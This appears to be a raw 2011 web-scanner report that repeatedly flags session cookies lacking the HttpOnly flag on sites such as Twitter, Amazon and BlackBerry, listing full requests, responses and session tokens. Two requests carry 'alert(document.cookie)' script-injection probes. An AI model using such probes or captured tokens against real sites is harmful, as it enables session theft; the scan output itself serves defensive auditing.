GET /$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
guest_id=129694277128817686; path=/; expires=Mon, 07 Mar 2011 21:52:51 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 21:52:51 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 21:52:51 +0000 2011-65977-37832 ETag: "9cbed84ee46357ad6eeda7e5594d953e" Last-Modified: Sat, 05 Feb 2011 21:52:51 GMT X-Runtime: 0.00464 Content-Type: text/html; charset=utf-8 Content-Length: 43885 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296942771285663; path=/; expires=Sat, 12-Feb-11 21:52:51 GMT; domain=.twitter.com Set-Cookie: guest_id=129694277128817686; path=/; expires=Mon, 07 Mar 2011 21:52:51 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFks0PctAToHaWQiJTI1M2RkNWFjYWE5MzQ0%250ANzI3OTY5MzUwMjMxMDk1Njk4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b166f799ab6822f231f1cb3f1d2746bfa9e0bc22; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
guest_id=129694277103136378; path=/; expires=Mon, 07 Mar 2011 21:52:51 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ORTHOSuperSite HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 21:52:51 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 21:52:51 +0000 2011-54414-25157 ETag: "a22e3a1e0872e4ff690e148e7be6dce6" Last-Modified: Sat, 05 Feb 2011 21:52:51 GMT X-Runtime: 0.00565 Content-Type: text/html; charset=utf-8 Content-Length: 50362 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296942771024590; path=/; expires=Sat, 12-Feb-11 21:52:51 GMT; domain=.twitter.com Set-Cookie: guest_id=129694277103136378; path=/; expires=Mon, 07 Mar 2011 21:52:51 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFgr0PctAToHaWQiJWMzNjM4Yjc5MDhlOWY3%250AYmIyOTNiM2FkMzU3NmNlNTUzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--73c6365753d94a587faec491fa68d9b7ca42e7ce; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129694570819625750; path=/; expires=Mon, 07 Mar 2011 22:41:48 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /VibrantMedia HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 22:41:48 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 22:41:48 +0000 2011-22776-43302 ETag: "58cb376bf09671dadfea46b170bfe723" Last-Modified: Sat, 05 Feb 2011 22:41:48 GMT X-Runtime: 0.00548 Content-Type: text/html; charset=utf-8 Content-Length: 60206 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296945708188753; path=/; expires=Sat, 12-Feb-11 22:41:48 GMT; domain=.twitter.com Set-Cookie: guest_id=129694570819625750; path=/; expires=Mon, 07 Mar 2011 22:41:48 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCKX8%252FPctAToHaWQiJWZiYWE2NTExMzU3MTU2%250AODhmODhmNjIyMTc3MTIxOTU0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--41b706acf658b115a8b0aaba3804015520340aec; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129694570698256586; path=/; expires=Mon, 07 Mar 2011 22:41:46 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /owneriq HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 22:41:46 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 22:41:46 +0000 2011-177-38107 ETag: "3b98753c7a9afa70f5b47cbe55fbd34d" Last-Modified: Sat, 05 Feb 2011 22:41:46 GMT X-Runtime: 0.00745 Content-Type: text/html; charset=utf-8 Content-Length: 49734 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296945706972339; path=/; expires=Sat, 12-Feb-11 22:41:46 GMT; domain=.twitter.com Set-Cookie: guest_id=129694570698256586; path=/; expires=Mon, 07 Mar 2011 22:41:46 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTAxOTg5ZTQwNDI2NWFmODgwNDFiY2ZlNDhhYzRlNmMyIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI6Pf89y0B--7ec0c9d885ab1c36d31391ef5f8dd6b7dc09b362; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129694548879674662; path=/; expires=Mon, 07 Mar 2011 22:38:08 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/users HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 302 Found Date: Sat, 05 Feb 2011 22:38:08 GMT Server: hi Status: 302 Found Location: http://twitter.com/login?redirect_after_login=%2Fsearch%2Fusers X-Runtime: 0.00169 Content-Type: text/html; charset=utf-8 Content-Length: 129 Cache-Control: no-cache, max-age=300 Set-Cookie: k=173.193.214.243.1296945488792262; path=/; expires=Sat, 12-Feb-11 22:38:08 GMT; domain=.twitter.com Set-Cookie: guest_id=129694548879674662; path=/; expires=Mon, 07 Mar 2011 22:38:08 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCJ2j%252BfctAToOcmV0dXJuX3RvIiRodHRwOi8v%250AdHdpdHRlci5jb20vc2VhcmNoL3VzZXJzOgdpZCIlMGY2Njk4NmFlODY0OWIw%250ANDM4NmQ1NzBiOWQ1MGVlNDUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--712ed848cada83454aa0484bff4ba74f3f11800c; domain=.twitter.com; path=/ Expires: Sat, 05 Feb 2011 22:43:08 GMT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fsearch%2Fusers">redirected</a>.</body></html>
guest_id=12970082986758922; path=/; expires=Tue, 08 Mar 2011 16:04:58 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /share HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 403 Forbidden Date: Sun, 06 Feb 2011 16:04:58 GMT Server: hi Status: 403 Forbidden X-Transaction: Sun Feb 06 16:04:58 +0000 2011-40077-14485 Last-Modified: Sun, 06 Feb 2011 16:04:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4792 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1297008298671071; path=/; expires=Sun, 13-Feb-11 16:04:58 GMT; domain=.twitter.com Set-Cookie: guest_id=12970082986758922; path=/; expires=Tue, 08 Mar 2011 16:04:58 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLQKuPstAToHaWQiJWM5ZWQ0YTM5M2QwOTE2%250AZTMwZjY1YmYzYzViZGVjNzk1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--3851482bffb10ede1aa19e1f488c062976d13f30; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
guest_id=129700829925695163; path=/; expires=Tue, 08 Mar 2011 16:04:59 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tipd HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 06 Feb 2011 16:04:59 GMT Server: hi Status: 200 OK X-Transaction: Sun Feb 06 16:04:59 +0000 2011-13423-17119 ETag: "e708862f325a33615acc11e3cbe342ac" Last-Modified: Sun, 06 Feb 2011 16:04:59 GMT X-Runtime: 0.00541 Content-Type: text/html; charset=utf-8 Content-Length: 48007 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1297008299249903; path=/; expires=Sun, 13-Feb-11 16:04:59 GMT; domain=.twitter.com Set-Cookie: guest_id=129700829925695163; path=/; expires=Tue, 08 Mar 2011 16:04:59 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPkMuPstAToHaWQiJWNhNzJmNDk3MWFmM2I0%250AYmNhYWE5OGUyOWNiZDUzNjhjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--10750576955489608e16b235f232e55307bee9f6; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: unalog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:41:49 GMT Server: Apache Expires: Sat, 05 Feb 2011 22:43:01 GMT Vary: Cookie,Accept-Encoding Last-Modified: Sat, 05 Feb 2011 22:38:01 GMT ETag: "73c782c6bc306be430973b406283c17e" Cache-Control: max-age=300 Set-Cookie: csrftoken=ac1e05ab7cd83b14b6dda0b829643047; Max-Age=31449600; Path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /developers/* HTTP/1.1 Host: us.blackberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=rimglobal%2Crimbbus; fsr.s={"v":1,"rid":"1296999185012_659282","ru":"http://burp/show/47","r":"burp","st":"","pv":1,"to":3,"c":"http://us.blackberry.com/smartphones/94178\"><script>alert(document.cookie)</script>d0d62204af5/","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1296999186933}; s_cc=true; BLLY=35Q54e83kMijy_nk89V0lFAxrY6VDtbVadHWdB3h9L8A2uRr36LQVVw; s_sv_p1=1@17@d/10004/13235&e/3; s_sv_s1=1@16@a//1296999182564; s_vi=[CS]v1|26A75174851D0DA2-40000133800583FB[CE]; s_sq=%5B%5BB%5D%5D; fsr.a=1296999208657; survey=true; s_sv_sid=641990084704;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /macedonia/mk/sonovnik.php HTTP/1.1 Host: www.360macedonia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:52:56 GMT Server: Apache/2.2.11 X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=12e42525981803e02636130728dd646c; path=/ Connection: close Content-Type: text/html Content-Length: 26392
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>........ ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ads/conbanner_bild1.php?cat=bild_bildbanner&w=728&h=90&zanox_tracking_host=http://ad.zanox.com/ppc/&zanox_tracking_param=14786739C435671106%26ULP HTTP/1.1 Host: www.ad4mat.de Proxy-Connection: keep-alive Referer: http://www.shoppinga.de/?bd2d5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3b5e976e9e=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:39:38 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.10 Set-Cookie: PHPSESSID=158dbd606aebc0d8d2504e47a422f607; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 3914 Connection: close Content-Type: text/html Set-Cookie: ad4mat_lb=616182620.20480.0000; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="expires" content="0"><meta http-equiv="cache-control" content="no-ca ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:25 GMT Server: Server Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Sat, 05-Feb-2011 23:01:25 GMT x-amz-id-1: 0KCJW8RY05PKJVC74BS4 p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: ZOHvQ9RGUMwBOJTa2KvnRusGxeBk9Xx5NIoqKO+M/pseIEcTTQSnTJ7z6CUtyShJ Vary: Accept-Encoding,User-Agent nnCoection: close Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=188-9552736-3777102; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 131368
<html> <head>
<style type="text/css"><!--
BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FF ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
SESSID=3780594123c995c1366cffc6b7a5fe3a; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.americanexpressfhr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.baselinemag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=262210463.1296998524.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/45; ebNewBandWidth_.www.baselinemag.com=2657%3A1296998583815; successpage=/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/; s_sq=%5B%5BB%5D%5D; s_nr=1296998582163-New; __utma=262210463.1274416164.1296998524.1296998524.1296998524.1; __utmc=262210463; __qca=P0-352073445-1296998593146; __utmb=262210463.3.10.1296998524; sessioncookie=a3c496ee62329678ad4d9915421e3c06;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ HTTP/1.1 Host: www.baselinemag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /googlecse.html HTTP/1.1 Host: www.baselinemag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=262210463.1296998524.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/45; ebNewBandWidth_.www.baselinemag.com=2657%3A1296998583815; successpage=/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/; s_sq=%5B%5BB%5D%5D; s_nr=1296998582163-New; __utma=262210463.1274416164.1296998524.1296998524.1296998524.1; __utmc=262210463; __qca=P0-352073445-1296998593146; __utmb=262210463.3.10.1296998524; sessioncookie=a3c496ee62329678ad4d9915421e3c06;
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.beckerortho.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Date: Sat, 05 Feb 2011 21:49:37 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDCQSSDRQQ=LPAPMINCHLCMAFPPCLPLJAFD; path=/ Vary: Accept-Encoding Content-Length: 35585
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.bibsonomy.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:30 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Via: 1.1 www.bibsonomy.org, 1.1 www.bibsonomy.org X-Pingback: http://scraper.bibsonomy.org/xmlrpc Set-Cookie: JSESSIONID=69F28CAB61CBF1AC490EAB83BB7E82F5; Path=/ Connection: close Content-Length: 61584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; cha ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /profile/ HTTP/1.1 Host: www.blackberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bookmarks.fr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.breitband-anbieter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:06:46 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny3 Set-Cookie: PHPSESSID=be4199973dec3f08f708b276dc31a269; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 13521
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/iphone-5-ipad-2-und-die-lte-tarife-der-deutschen-telekom-659000/ HTTP/1.1 Host: www.breitband-anbieter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:06:47 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny3 Set-Cookie: PHPSESSID=8fd9477c929c1497df94dbe8861525f5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 13229
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de"> <head>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /web/about/ac123/ac147/archived_issues/ipj_9-1/ip_addresses.html HTTP/1.1 Host: www.cisco.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.coe.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.13 ETag: "cd5e8abd80fd03f2c8d32b33e06270c9" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Set-Cookie: SESSe21231bc09705de79a97f2d6b2e890fb=645k56n5kokbe2trg1b1r6h6e7; expires=Tue, 01-Mar-2011 01:27:06 GMT; path=/; domain=.coe.gatech.edu Last-Modified: Fri, 04 Feb 2011 19:45:42 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.diigo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
